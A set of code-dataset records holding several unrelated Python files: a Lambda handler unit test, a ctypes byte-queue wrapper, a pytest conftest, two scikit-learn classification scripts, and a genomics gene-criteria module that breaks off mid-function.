\"GET\",\n \"requestContext\":\n {\"authorizer\":\n {\"claims\":\n {\"email\": \"dummy@dummy.com\"}\n }\n }\n }\n\n self.get_user_profile = {\"path\": \"/profile\",\n \"httpMethod\": \"GET\",\n \"requestContext\":\n {\"authorizer\":\n {\"claims\":\n {\"email\": \"dummy@dummy.com\"}\n }\n }\n }\n\n self.update_user_profile = {\"path\": \"/profile\",\n \"httpMethod\": \"POST\",\n \"body\": '{\"email_alerts\": true, \"is_terms_accepted\": true}',\n \"requestContext\":\n {\"authorizer\":\n {\"claims\":\n {\"email\": \"dummy@dummy.com\"}\n }\n }\n }\n self.get_user_feedback = {\"path\": \"/feedback\",\n \"httpMethod\": \"GET\",\n \"queryStringParameters\": {},\n \"requestContext\":\n {\"authorizer\":\n {\"claims\":\n {\"email\": \"dummy@dummy.com\"}\n }\n }\n }\n self.set_user_feedback = {\"path\": \"/feedback\",\n \"httpMethod\": \"POST\",\n \"body\": '{\"feedback\": {\"org_id\": \"test-snet\", \"service_id\": \"test-service\",'\n ' \"user_rating\": \"4.0\", \"comment\": \"Good Job!\"} }',\n \"requestContext\":\n {\"authorizer\":\n {\"claims\":\n {\"email\": \"dummy@dummy.com\"}\n }\n }\n }\n\n @patch('common.utils.Utils.report_slack')\n def test_request_handler(self, mock_get):\n # event dict is {}\n response = lambda_handler.request_handler(\n event=self.event, context=None)\n assert (response[\"statusCode\"] == 400)\n assert (response[\"body\"] == '\"Bad Request\"')\n\n # event dict has invalid path\n test_event = {\"path\": \"/dummy\", \"httpMethod\": \"GET\"}\n test_event.update(self.event)\n response = lambda_handler.request_handler(\n event=test_event, context=None)\n assert (response[\"statusCode\"] == 404)\n assert (response[\"body\"] == '\"Not Found\"')\n\n @patch('common.utils.Utils.report_slack')\n @patch('sign_up.user.User.fetch_private_key_from_ssm')\n def test_user_signup(self, fetch_private_key_from_ssm_mock, report_slack_mock):\n self.test_del_user_data()\n fetch_private_key_from_ssm_mock.return_value = \"mock_address\"\n report_slack_mock.return_value = \"mock_address\"\n self.signup['requestContext'].update(self.event['requestContext'])\n response = lambda_handler.request_handler(\n event=self.signup, context=None)\n assert (response[\"statusCode\"] == 200)\n response_body = json.loads(response[\"body\"])\n assert (response_body[\"status\"] == \"success\")\n # hit again with same payload\n response = lambda_handler.request_handler(\n event=self.signup, context=None)\n assert (response[\"statusCode\"] == 500)\n response_body = json.loads(response[\"body\"])\n assert (response_body[\"status\"] == \"failed\")\n\n def test_del_user_data(self):\n self.delete_user['requestContext'].update(self.event['requestContext'])\n response = lambda_handler.request_handler(\n event=self.delete_user, context=None)\n assert (response[\"statusCode\"] == 200)\n response_body = json.loads(response[\"body\"])\n assert (response_body[\"status\"] == \"success\")\n\n def test_get_user_profile(self):\n self.get_user_profile['requestContext'].update(\n self.event['requestContext'])\n response = lambda_handler.request_handler(\n event=self.get_user_profile, context=None)\n assert (response[\"statusCode\"] == 200)\n response_body = json.loads(response[\"body\"])\n assert (response_body[\"status\"] == \"success\")\n\n def test_update_user_profile(self):\n self.update_user_profile['requestContext'].update(\n self.event['requestContext'])\n response = lambda_handler.request_handler(\n event=self.update_user_profile, context=None)\n assert (response[\"statusCode\"] == 200)\n response_body = json.loads(response[\"body\"])\n assert (response_body[\"status\"] == \"success\")\n\n def test_get_user_feedback(self):\n self.get_user_feedback['requestContext'].update(\n self.event['requestContext'])\n response = lambda_handler.request_handler(\n event=self.get_user_feedback, context=None)\n assert (response[\"statusCode\"] == 200)\n response_body = json.loads(response[\"body\"])\n assert (response_body[\"status\"] == \"success\")\n\n def test_set_user_feedback(self):\n self.set_user_feedback['requestContext'].update(\n self.event['requestContext'])\n response = lambda_handler.request_handler(\n event=self.set_user_feedback, context=None)\n assert (response[\"statusCode\"] == 200)\n response_body = json.loads(response[\"body\"])\n assert (response_body[\"status\"] == \"success\")\n\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"tests/test_dapp_user.py","file_name":"test_dapp_user.py","file_ext":"py","file_size_in_byte":7076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"355565629","text":"from ctypes import *\nfrom numpy import array\nfrom numpy.ctypeslib import ndpointer\nfrom cfg import ecosystem_path\n\n################################################################################\n# Must have already complied to byte_queue.so; try from src:\n\n# gcc -g -shared -fPIC ../../../c_common/user_lib/src/byte_queue.c -I ../../../c_common/user_lib/inc -o ../obj/_byte_queue.so\n\n################################################################################\n# Configure Low Level Access to C Library\n\nf = ecosystem_path + '/py_common/user_lib/obj/_byte_queue.so'\n\nclib = cdll.LoadLibrary(f);\n\nclass ByteQueueC(Structure):\n _fields_ = [(\"data\", POINTER(c_uint8)),\n (\"start\", POINTER(c_uint8)),\n (\"end\", POINTER(c_uint8)),\n (\"data_size\", c_uint16),\n (\"count\", c_uint16)]\n \n#class ByteQueueC32(Structure):\n# _fields_ = [(\"data\", POINTER(c_uint8)),\n# (\"start\", POINTER(c_uint8)),\n# (\"end\", POINTER(c_uint8)),\n# (\"data_size\", c_uint16),\n# (\"count\", c_uint16),\n# (\"buffer\", c_uint8 * 32)]\n\n_InitBQ = clib.InitBQ\n_InitBQ.argtypes = [POINTER(ByteQueueC), ndpointer(c_uint8), c_uint16] # original\n\n#_InitBQ.argtypes = [POINTER(ByteQueueC), POINTER(c_char*20), c_uint16] # not any better\n#_InitBQ.argtypes = [POINTER(ByteQueueC), POINTER(c_uint8), c_uint16] # not any better\n\n#_InitBQ32 = clib.InitBQ32\n#_InitBQ32.argtypes = [POINTER(ByteQueueC32)]\n\n\n################################################################################\n# Define Convenience Class\n\n#class ByteQueue:\n# def __init__(self, data_size=20):\n# self.bqc = ByteQueueC()\n# self.data = array(size, dtype=c_uint8)\n# _InitBQ(self.bqc, data, data_size)\n","sub_path":"Embedded_cal_test/ecosystem/py_common/user_lib/src/wrapped_libs/byte_queue.py","file_name":"byte_queue.py","file_ext":"py","file_size_in_byte":1803,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"36743164","text":"# XXX: can probably get rid of this!\nfrom backpack import monkeypatch\nmonkeypatch()\n\nimport redis\nimport webtest\nimport requests\nimport logging\nimport py.test\nimport tempfile\nimport six\n\nfrom peewee import SqliteDatabase\nfrom backpack import Backpack\nfrom backpack.auth import AuthPlugin\nfrom bottlecap.testing import LiveServerThread, DummySMTPServerThread\nfrom requests import Session\n\nif six.PY3: # pragma: nocover\n from urllib.parse import urljoin\nelse: # pragma: nocover\n from urlparse import urljoin\n\n# fix logging\n#logging.basicConfig(level=logging.DEBUG)\n#logger = logging.getLogger('peewee')\n#logger.setLevel(logging.DEBUG)\n#logger.addHandler(logging.StreamHandler())\n\n\nclass LiveServerSession(requests.Session):\n def __init__(self, prefix_url, *args, **kwargs):\n self.prefix_url = prefix_url\n super(LiveServerSession, self).__init__(*args, **kwargs)\n\n def request(self, method, url, *args, **kwargs):\n url = urljoin(self.prefix_url, url)\n return super().request(method, url, *args, **kwargs)\n\n\n@py.test.fixture\ndef database(request):\n tmp = tempfile.NamedTemporaryFile()\n db = SqliteDatabase(tmp.name)\n request.addfinalizer(db.drop_database)\n return db\n\n\nclass CustomStrictRedis(redis.StrictRedis):\n def create_database(self):\n self.flush()\n\n def destroy_database(self):\n self.flush()\n\n\n@py.test.fixture\ndef app(request, database):\n \"\"\"Start live server session and import db fixtures\"\"\"\n app = Backpack(catchall=False)\n app.push_context_manager()\n\n # create smtp server\n smtp_server = DummySMTPServerThread()\n smtp_server.start()\n request.addfinalizer(smtp_server.stop)\n\n # create liveserver\n live_server = LiveServerThread(host='127.0.0.1', port=0, app=app)\n live_server.start()\n request.addfinalizer(live_server.stop)\n app.config['backpack.base_url'] = live_server.url\n app.config['backpack.smtp.host'] = smtp_server.server.hostname\n app.config['backpack.smtp.port'] = smtp_server.server.port\n app.config['backpack.smtp.starttls'] = False\n\n # add auth plugin\n app.config['backpack.auth.jwt_key'] = 'example1'\n app.config['backpack.auth.password_key'] = 'example2'\n app.config['backpack.auth.oath_secret'] = 'example3'\n app.install(AuthPlugin())\n\n # setup databases\n app.databases['default'] = database\n app.databases['rq'] = CustomStrictRedis(db=1)\n app.syncdb()\n\n # setup app\n app.sanity_check()\n app.session = LiveServerSession(prefix_url=live_server.url)\n app.webtest = webtest.TestApp(app)\n app.smtp_server = smtp_server.server\n\n # remove app from context\n request.addfinalizer(app.pop_context_manager)\n request.addfinalizer(app.destroydb)\n return app\n","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":2740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"368276612","text":"import os\nimport pandas as pd\nimport numpy as np\nimport seaborn as sns; sns.set(style=\"ticks\", color_codes=True)\n#import matplotlib.pyplot as plt\n\n\n#from matplotlib.backends.backend_tkagg import FigureCanvasTkAgg\n#from sklearn.model_selection import train_test_split\n#from sklearn import linear_model\n#from sklearn.linear_model import LinearRegression\n#from sklearn.model_selection import KFold\n#from sklearn.metrics import mean_squared_error, r2_score\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn import metrics\nfrom sklearn.feature_selection import SelectKBest\nfrom sklearn.feature_selection import chi2\n\n# set directory\nos.getcwd()\nos.chdir('C:/github/B9DA104/CA2/')\n\n# read file\ndata_set = pd.read_csv('raw-responses-1.csv')\ndata_set = data_set.dropna()\n\n# inspect data\ntype(data_set)\ndata_set.head()\ndata_set.describe()\ndata_set.dtypes\nprint(data_set.shape)\ndata_set.info() #count non-null values in the columns\ndata_set.isnull().sum(axis=0) #count blanks in the columns\n\n# subset with necessary columns only\ncolumns_or = ['q0001','q0002','q0005','q0008_0001','q0008_0002','q0008_0003','q0008_0004','q0008_0005'\n ,'q0008_0006','q0008_0007','q0008_0008','q0008_0009','q0008_0010','q0008_0011','q0008_0012'\n ,'q0017','q0018','q0022','q0024','q0026','age3','q0028','q0029' ]\n\ncolumns_cat = ['q0001_cat','q0002_cat','q0005_cat','q0008_0001_cat','q0008_0002_cat','q0008_0003_cat'\n ,'q0008_0004_cat','q0008_0005_cat','q0008_0006_cat','q0008_0007_cat','q0008_0008_cat'\n ,'q0008_0009_cat','q0008_0010_cat','q0008_0011_cat','q0008_0012_cat','q0017_cat','q0018_cat'\n ,'q0022_cat','q0024_cat','q0026_cat','age3_cat','q0028_cat','q0029_cat']\n\n\ndata_sub = data_set[columns_or]\n\ndata_sub.dtypes\ndata_sub.info() #count non-null values in the columns\ndata_sub.isnull().sum(axis=0) #count blanks in the columns\n\n# categorical encoding (text data into numerical)\nobj_df = data_sub\n\n# change all columns to 'category' type to apply categorical transformation\nfor col in [columns_or]:\n obj_df[col] = obj_df[col].astype('category')\n\n# creating categorical columns based in each df column\nobj_df['q0001_cat'] = obj_df['q0001'].cat.codes\nobj_df['q0002_cat'] = obj_df['q0002'].cat.codes\nobj_df['q0005_cat'] = obj_df['q0005'].cat.codes\nobj_df['q0008_0001_cat'] = obj_df['q0008_0001'].cat.codes\nobj_df['q0008_0002_cat'] = obj_df['q0008_0002'].cat.codes\nobj_df['q0008_0003_cat'] = obj_df['q0008_0003'].cat.codes\nobj_df['q0008_0004_cat'] = obj_df['q0008_0004'].cat.codes\nobj_df['q0008_0005_cat'] = obj_df['q0008_0005'].cat.codes\nobj_df['q0008_0006_cat'] = obj_df['q0008_0006'].cat.codes\nobj_df['q0008_0007_cat'] = obj_df['q0008_0007'].cat.codes\nobj_df['q0008_0008_cat'] = obj_df['q0008_0008'].cat.codes\nobj_df['q0008_0009_cat'] = obj_df['q0008_0009'].cat.codes\nobj_df['q0008_0010_cat'] = obj_df['q0008_0010'].cat.codes\nobj_df['q0008_0011_cat'] = obj_df['q0008_0011'].cat.codes\nobj_df['q0008_0012_cat'] = obj_df['q0008_0012'].cat.codes\nobj_df['q0017_cat'] = obj_df['q0017'].cat.codes\nobj_df['q0018_cat'] = obj_df['q0018'].cat.codes\nobj_df['q0022_cat'] = obj_df['q0022'].cat.codes\nobj_df['q0024_cat'] = obj_df['q0024'].cat.codes\nobj_df['q0026_cat'] = obj_df['q0026'].cat.codes\nobj_df['age3_cat'] = obj_df['age3'].cat.codes\nobj_df['q0028_cat'] = obj_df['q0028'].cat.codes\nobj_df['q0029_cat'] = obj_df['q0029'].cat.codes\n\n# creating new df excluding original columns\ndf_cat = obj_df.drop(['q0001','q0002','q0005','q0008_0001','q0008_0002','q0008_0003','q0008_0004','q0008_0005'\n ,'q0008_0006','q0008_0007','q0008_0008','q0008_0009','q0008_0010','q0008_0011','q0008_0012'\n ,'q0017','q0018','q0022','q0024','q0026','age3','q0028','q0029'], axis=1)\n\n\n# Gaussian Naive Bayes Classification\n\n# creating 'x' and 'y' objects to be used into the Multiple Linear Regression\nx = pd.DataFrame(df_cat, columns=['q0002_cat','q0005_cat','q0008_0001_cat','q0008_0002_cat','q0008_0003_cat'\n ,'q0008_0004_cat','q0008_0005_cat','q0008_0006_cat','q0008_0007_cat','q0008_0008_cat'\n ,'q0008_0009_cat','q0008_0010_cat','q0008_0011_cat','q0008_0012_cat','q0017_cat','q0018_cat'\n ,'q0022_cat','q0024_cat','q0026_cat','age3_cat','q0028_cat','q0029_cat'])\n\ny = pd.DataFrame(df_cat, columns=['q0001_cat'])\n\n# feature extraction\nnp.set_printoptions(suppress=True)\n\ntest = SelectKBest(score_func=chi2, k=3)\nfit = test.fit(x, y)\n# summarize scores\nnp.set_printoptions(precision=3)\nprint(fit.scores_)\n\n# recriating x with better scored features\nx = pd.DataFrame(df_cat, columns=['q0008_0001_cat','q0029_cat','q0008_0006_cat','q0022_cat','q0008_0009_cat'\n ,'q0026_cat','q0017_cat','q0008_0002_cat','q0008_0004_cat','q0008_0003_cat'\n ,'q0008_0007_cat','q0008_0008_cat','q0005_cat','q0002_cat','q0018_cat'])\n\n# spliting database\nk2 = int(len(df_cat['q0001_cat']) * 0.2) # 20% samples\n\n\nx_train = x[k2:] #80%\nx_train = np.c_[np.ones(len(x_train),dtype='int64'),x_train]\ny_train = y[k2:]\n\nx_test = x[:k2] #20%\nx_test = np.c_[np.ones(len(x_test),dtype='int64'),x_test]\ny_test = y[:k2]\ny_test = y_test.round(0)\n\n# train the model\nclf = GaussianNB()\nclf.fit(x_train, y_train)\n\n# use the model to predict the labels of the test data\npredicted = clf.predict(x_test)\nexpected = y_test\n\nprint(predicted) \nprint(expected) \n\n\npredicted_df = pd.DataFrame({'q0001_cat':predicted})\n\npredicted_m = predicted_df.values\nexprected_m = expected.values\n\n# check performance \nmatches = (predicted_m == exprected_m)\ncorrect = (matches.sum() / float(len(matches)))*100\nprint('Coredictions match(%): ',correct.round(2))\n\nprint(metrics.confusion_matrix(exprected_m, predicted_m))\n\n","sub_path":"CA2/MasculinitySurvey/CA2_CM_v1.py","file_name":"CA2_CM_v1.py","file_ext":"py","file_size_in_byte":5711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"123338272","text":"'''Write code to create a list of word lengths for the words in original_str using the accumulation pattern \nand assign the answer to a variable num_words_list. (You should use the len function).'''\n\noriginal_str = \"The quick brown rhino jumped over the extremely lazy fox\"\n\nsplit_string = original_str.split()\n\ncount = 0\nfor word in split_string:\n split_string[count] = len(word)\n count += 1\n \nnum_words_list = split_string\nprint(num_words_list)","sub_path":"Chapter_7/ex_7_18.py","file_name":"ex_7_18.py","file_ext":"py","file_size_in_byte":455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"646318025","text":"#!/usr/bin/env python2.7\n\nimport numpy as np\nimport sys\nimport skflow\nfrom sklearn import linear_model, svm, tree, neighbors\nfrom sklearn.neighbors.nearest_centroid import NearestCentroid\nfrom sklearn.linear_model import *\nfrom sklearn.ensemble import *\nfrom sklearn.dummy import *\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.preprocessing import *\nfrom sklearn.gaussian_process import GaussianProcessClassifier\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.discriminant_analysis import QuadraticDiscriminantAnalysis\nfrom sklearn.decomposition import PCA\nfrom sklearn.pipeline import Pipeline\nfrom sklearn import preprocessing\nfrom sklearn.model_selection import GridSearchCV, cross_val_score\n\n\n#print_all = True\nprint_all = False\n\nprinted_already = {}\nprinted_already_rr = {}\n\npolynomial = False\npolynomial_number = 3\n\ndef to_new_sample(data, printy):\n LOC = data[0]\n RR = data[1]\n l3_hit = data[2]\n l3_miss = data[3]\n local_dram = data[4]\n remote_dram = data[5]\n l2_miss = data[6]\n uops_retired = data[7]\n unhalted_cycles = data[8]\n remote_fwd = data[9]\n remote_hitm = data[10]\n instructions = data[11]\n context_switches = data[12]\n bw1 = data[13]\n bw2 = data[14]\n bw3 = data[15]\n bw4 = data[17]\n number_of_threads = data[17]\n\n intra_socket = l2_miss - (l3_hit + l3_miss)\n inter_socket = remote_fwd + remote_hitm\n bw = bw1 + bw2 + bw3 + bw4\n local_accesses = 0\n if local_dram > 0 or remote_dram > 0:\n local_accesses = local_dram / (1 + local_dram + float(remote_dram))\n\n normalized = 18 * [0.]\n normalized[0] = LOC\n normalized[1] = RR\n for i in range(2, 12):\n normalized[i] = (float(data[i]) / float(2 * 1000 * 1000 * 1000)) / float(number_of_threads)\n\n for i in range(12, 16):\n normalized[i] = float(data[i]) / float(number_of_threads)\n\n normalized[17] = data[17]\n\n llc_hitrate = l3_hit / float(l3_hit + l3_miss)\n new_data = np.array([LOC, RR, intra_socket / float(uops_retired), inter_socket / float(uops_retired), local_dram / float(uops_retired), remote_dram / float(uops_retired),\n local_dram / float(1 + local_dram + remote_dram), float(remote_fwd + remote_hitm) / float(uops_retired), \n instructions / float(unhalted_cycles), uops_retired / float(instructions), l3_hit / float(uops_retired), l3_miss / float(uops_retired),\n l3_hit / (l3_hit + float(l3_miss)), float(uops_retired) / float(unhalted_cycles), number_of_threads])\n\n new_data = np.array([LOC, RR, intra_socket / float(uops_retired), inter_socket / float(uops_retired),\n uops_retired / float(unhalted_cycles), number_of_threads,\n l3_hit / (l3_hit + float(l3_miss)), l3_miss / float(uops_retired), (local_dram + remote_dram) / float(uops_retired),\n 4 * bw if RR else bw, instructions / float(uops_retired) ])\n \n if printy:\n if LOC == 1:\n if number_of_threads in printed_already:\n if printed_already[number_of_threads] == 2 and not print_all:\n return new_data\n elif printed_already[number_of_threads] == 1:\n printed_already[number_of_threads] = printed_already[number_of_threads] + 1\n else:\n printed_already[number_of_threads] = 1\n\n print(\"LOC\")\n else:\n if number_of_threads in printed_already_rr:\n if printed_already_rr[number_of_threads] == 2 and not print_all:\n return new_data\n elif printed_already_rr[number_of_threads] == 1:\n printed_already_rr[number_of_threads] = printed_already_rr[number_of_threads] + 1\n else:\n printed_already_rr[number_of_threads] = 1\n\n print(\"RR\")\n \n # print(\"number of threads: \" + str(number_of_threads))\n # print(\"llc hit rate: \" + str(llc_hitrate))\n # print(\"intra_socket: \" + str(intra_socket / float(uops_retired)))\n # print(\"inter_socket: \" + str(inter_socket / float(uops_retired)))\n # print(\"local: \" + str(local_dram / float(uops_retired)))\n # print(\"remote: \" + str(remote_dram / float(uops_retired)))\n # print(\"bw: \" + str((bw) / float(unhalted_cycles) ))\n print(\"number ol threads: \" + str(number_of_threads))\n print(\"llc hit rate: \" + str(llc_hitrate))\n print(\"intra socket: \" + str(intra_socket / float(uops_retired)))\n print(\"inter socket: \" + str(inter_socket / float(uops_retired)))\n print(\"uops retired per cycle: \" + str(uops_retired / float(unhalted_cycles)))\n print(\"llcc miss per uops retired: \" + str(l3_miss / float(uops_retired)))\n print(\"bw1, bw2, bw3, bw4: \" + str(bw1) + \" \" + str(bw2) + \" \" + str(bw3) + \" \" + str(bw4))\n print(\"(local + remote dram): \" + str((local_dram + remote_dram) / float(uops_retired)))\n #print(\"bw: \" +str((bw) / float(unhalted_cycles) ))\n\n \n print(new_data)\n print(data)\n print(\"------\")\n\n #return new_data\n return data\n\n\ndef transform(all_data, printy):\n\n new_all_data = to_new_sample(all_data[0], printy)\n\n for i in range(1, all_data.shape[0]):\n data = all_data[i]\n new_data = to_new_sample(data, printy)\n new_all_data = np.vstack((new_all_data, new_data))\n\n return new_all_data\n\n\n\n\nactual_train_data=[]\nlabels=[]\n\ntrain_data = np.loadtxt(sys.argv[1], delimiter=',')\n(rows, cols) = train_data.shape\nlabels = train_data[:, cols - 1]\n\ndef classify(classifier_name, trained_classifier, test_filenames):\n print(\"============================================\")\n print(classifier_name)\n print(\"============================================\")\n\n # parameters = {'n_estimators':[5, 10, 20, 30, 40, 50, 100], 'criterion':('gini', 'entropy'), 'min_samples_split':[0.1, 0.2, 0.4, 0.5, 0.6, 0.7, 0.8, 0.9],\n # 'min_samples_leaf':[0.01, 0.1, 0.2, 0.4]}\n # clf = GridSearchCV(trained_classifier, parameters)\n # clf.fit(actual_train_data, labels)\n # print(clf.best_params_)\n\n scores = cross_val_score(trained_classifier, actual_train_data, labels, cv=10)\n print(\"Accuracy: %0.2f (+/- %0.2f)\" % (scores.mean(), scores.std() * 2))\n\n\n for fn in test_filenames:\n print(\">>> (\" + fn + \")\")\n test_data = np.loadtxt(fn, delimiter=',')\n test_data = test_data[:, 0:(cols - 1)]\n test_data = transform(test_data, False)\n #test_data = preprocessing.normalize(test_data, norm='l2')\n\n\n #print(\"actual test data: \" + str(test_data))\n if polynomial:\n poly = PolynomialFeatures(polynomial_number)\n test_data = poly.fit_transform(test_data)\n\n print(trained_classifier.predict(test_data))\n print(trained_classifier.predict_proba(test_data))\n ones = len(np.where((trained_classifier.predict(test_data) == 1))[0])\n zeros = len(np.where((trained_classifier.predict(test_data) == 0))[0])\n print(\"Result: \" + str(ones) + \"/\" + str(zeros))\n print(np.where((trained_classifier.predict(test_data) == labels) == False))\n\n \n print(\"============================================\")\n\n\ntest_filenames = []\nfor i in range(2, len(sys.argv)):\n test_filenames.append(sys.argv[i])\n\n\nactual_train_data = train_data[:, 0:cols - 1]\nprint(\"SHAPE of actual: \" + str(actual_train_data.shape))\n#print(\"SHAPE of actual: \" + str(transform(train_data[:, 0:cols - 1], False).shape))\n#print(transform(train_data[:, 0:cols - 1], False))\n\n\npipeline = Pipeline([('scaling', StandardScaler()), ('pca', PCA(n_components=3))])\n\nactual_train_data = transform(train_data[:, 0:cols - 1], False)\n#actual_train_data = preprocessing.normalize(actual_train_data, norm='l2')\n\n#print(\"actual train data: \" + str(actual_train_data[0]))\n\nif polynomial:\n poly = PolynomialFeatures(polynomial_number)\n actual_train_data = poly.fit_transform(actual_train_data)\n\nprint(\"----- About to have a look at test_data -----\")\n\n\n#print(pipeline.fit_transform(train_data[:, 0:cols - 1]))\n#print(pipeline.fit_transform(test_data))\n\n#test_data = poly.fit_transform(test_data)\n\n\n# clf = GaussianProcessClassifier()\n# res = clf.fit(actual_train_data, labels)\n# classify(\"gaussian process classifier\", res, test_filenames)\n\n# clf = GaussianNB()\n# res = clf.fit(actual_train_data, labels)\n# classify(\"gaussian NB\", res, test_filenames)\n\nrf = RandomForestClassifier(random_state=20)\nres = rf.fit(actual_train_data, labels)\nclassify(\"random forest classifier\", res, test_filenames)\n\n\nrf = RandomForestClassifier()\nres = rf.fit(actual_train_data, labels)\nclassify(\"random forest classifier no random state\", res, test_filenames)\n\n\n\nrf = RandomForestClassifier(n_estimators=30, criterion=\"gini\", min_samples_split=0.1, min_samples_leaf=0.01)\nres = rf.fit(actual_train_data, labels)\nclassify(\"random forest classifier no random state\", res, test_filenames)\n\n\nrf = RandomForestClassifier(n_estimators=1000, criterion=\"entropy\", min_samples_split=0.1, min_samples_leaf=0.01, oob_score=True, max_features=None)\nres = rf.fit(actual_train_data, labels)\nclassify(\"random forest classifier no random state\", res, test_filenames)\n\n","sub_path":"train_programs/NEW_sigterm_microbenchmarks/random_forest.py","file_name":"random_forest.py","file_ext":"py","file_size_in_byte":9274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"202862865","text":"import logging\nfrom builtins import classmethod\nfrom elastic.search import ElasticQuery, Search\nfrom elastic.query import Query, BoolQuery\nfrom elastic.elastic_settings import ElasticSettings\nfrom criteria.helper.criteria import Criteria\nfrom region import utils\nfrom elastic.result import Document\nfrom criteria.helper.criteria_manager import CriteriaManager\n\nlogger = logging.getLogger(__name__)\n\n\nclass GeneCriteria(Criteria):\n\n ''' GeneCriteria class define functions for building gene criterias, each as separate index types\n\n '''\n FEATURE_TYPE = 'gene'\n\n @classmethod\n def cand_gene_in_study(cls, hit, section=None, config=None, result_container={}):\n '''function that implements the cand_gene_in_study criteria\n '''\n\n result_container_ = result_container\n feature_doc = hit['_source']\n feature_doc['_id'] = hit['_id']\n\n genes = feature_doc['genes']\n diseases = feature_doc['diseases']\n study_id = feature_doc['study_id']\n author = feature_doc['authors'][0]\n\n first_author = author['name'] + ' ' + author['initials']\n\n result_container_populated = cls.populate_container(study_id,\n first_author,\n fnotes=None, features=genes,\n diseases=diseases,\n result_container=result_container_)\n return result_container_populated\n\n @classmethod\n def cand_gene_in_region(cls, hit, section=None, config=None, result_container={}):\n '''function that implements the cand_gene_in_region criteria\n '''\n feature_doc = hit['_source']\n feature_doc['_id'] = hit['_id']\n\n disease_loci = feature_doc[\"disease_locus\"].lower()\n\n if disease_loci == 'tbc':\n return result_container\n\n genes = []\n if 'genes' in feature_doc:\n genes = feature_doc['genes']\n\n disease = None\n if 'disease' in feature_doc:\n disease = feature_doc['disease']\n\n status = None\n if 'status' in feature_doc:\n status = feature_doc['status']\n\n if genes is None or disease is None or status is None:\n return result_container\n\n if status != 'N':\n return result_container\n\n region_index = ElasticSettings.idx('REGION', idx_type='STUDY_HITS')\n (region_idx, region_idx_type) = region_index.split('/')\n\n # print(region_idx + ' ' + region_idx_type)\n\n gene_dict = cls.get_gene_docs_by_ensembl_id(genes, sources=['chromosome', 'start', 'stop'])\n\n for gene in gene_dict:\n # get position\n gene_doc = gene_dict[gene]\n # print(gene_doc.__dict__)\n build = \"38\" # get it from index name genes_hg38_v0.0.2 TODO\n seqid = getattr(gene_doc, \"chromosome\")\n start = getattr(gene_doc, \"start\")\n stop = getattr(gene_doc, \"stop\")\n # check if they overlap a region\n overlapping_region_docs = cls.fetch_overlapping_features(build, seqid, start, stop,\n idx=region_idx, idx_type=region_idx_type)\n\n region_docs = utils.Region.hits_to_regions(overlapping_region_docs)\n\n if(region_docs is None or len(region_docs) == 0):\n continue\n\n for region_doc in region_docs:\n print(region_doc.__dict__)\n region_id = getattr(region_doc, \"region_id\")\n region_name = getattr(region_doc, \"region_name\")\n\n result_container_populated = cls.populate_container(region_id,\n region_name,\n fnotes=None, features=[gene],\n diseases=[disease],\n result_container=result_container)\n result_container = result_container_populated\n\n return result_container\n\n @classmethod\n def tag_feature_to_disease(cls, feature_doc, section, config, result_container={}):\n\n feature_class = cls.__name__\n # Get class from globals and create an instance\n m = globals()[feature_class]()\n # Get the function (from the instance) that we need to call\n func = getattr(m, section)\n result_container_ = func(feature_doc, section, config, result_container=result_container)\n return result_container_\n\n @classmethod\n def is_gene_in_mhc(cls, hit, section=None, config=None, result_container={}):\n\n feature_id = hit['_id']\n result_container_ = cls.tag_feature_to_all_diseases(feature_id, section, config, result_container)\n return result_container_\n\n @classmethod\n def gene_in_region(cls, hit, section=None, config=None, result_container={}):\n\n try:\n padded_region_doc = utils.Region.pad_region_doc(Document(hit))\n except:\n logger.warn('Region padding error ')\n return result_container\n\n # 'build_info': {'end': 22411939, 'seqid': '1', 'build': 38, 'start': 22326008}, 'region_id': '1p36.12_008'}\n region_id = getattr(padded_region_doc, \"region_id\")\n region_name = getattr(padded_region_doc, \"region_name\")\n build_info = getattr(padded_region_doc, \"build_info\")\n diseases = getattr(padded_region_doc, \"tags\")['disease']\n seqid = build_info['seqid']\n start = build_info['start']\n end = build_info['end']\n\n gene_index = ElasticSettings.idx('GENE', idx_type='GENE')\n elastic = Search.range_overlap_query(seqid=seqid, start_range=start, end_range=end,\n idx=gene_index, field_list=['start', 'stop', '_id'],\n seqid_param=\"chromosome\",\n end_param=\"stop\", size=10000)\n result_docs = elastic.search().docs\n\n genes = set()\n for doc in result_docs:\n genes.add(doc.doc_id())\n\n result_container_populated = cls.populate_container(region_id,\n region_name,\n fnotes=None, features=genes,\n diseases=diseases,\n result_container=result_container)\n return result_container_populated\n\n @classmethod\n def exonic_index_snp_in_gene(cls, hit, section=None, config=None, result_container={}):\n\n feature_doc = hit['_source']\n feature_doc['_id'] = hit['_id']\n\n marker = None\n if 'marker' in feature_doc:\n marker = feature_doc['marker']\n\n disease = None\n if 'disease' in feature_doc:\n disease = feature_doc['disease']\n\n status = None\n if 'status' in feature_doc:\n status = feature_doc['status']\n\n if marker is None or disease is None or status is None:\n return result_container\n\n if status != 'N':\n return result_container\n\n disease_loci = feature_doc[\"disease_locus\"].lower()\n\n if disease_loci == 'tbc':\n return result_container\n\n # get marker info and gene info from function info dbsp\n # get marker doc\n query = ElasticQuery(BoolQuery(must_arr=[Query.term(\"id\", marker)]), sources=['id', 'info'])\n elastic = Search(search_query=query, idx=ElasticSettings.idx('MARKER', 'MARKER'), size=1)\n docs = elastic.search().docs\n marker_doc = None\n\n if docs is not None and len(docs) > 0:\n marker_doc = elastic.search().docs[0]\n\n if marker_doc is None:\n return result_container\n\n from marker.templatetags.marker_tags import marker_functional_info\n from marker.templatetags.marker_tags import gene_info\n\n ''' Retrieve functional information from bitfield in the INFO column.\n ftp://ftp.ncbi.nlm.nih.gov/snp/specs/dbSNP_BitField_latest.pdf\n\n ('has synonymous', True), ('has reference', True), ('has stop gain', False),\n ('has non-synonymous missense', False), ('has non-synonymous frameshift', False), ('has stop 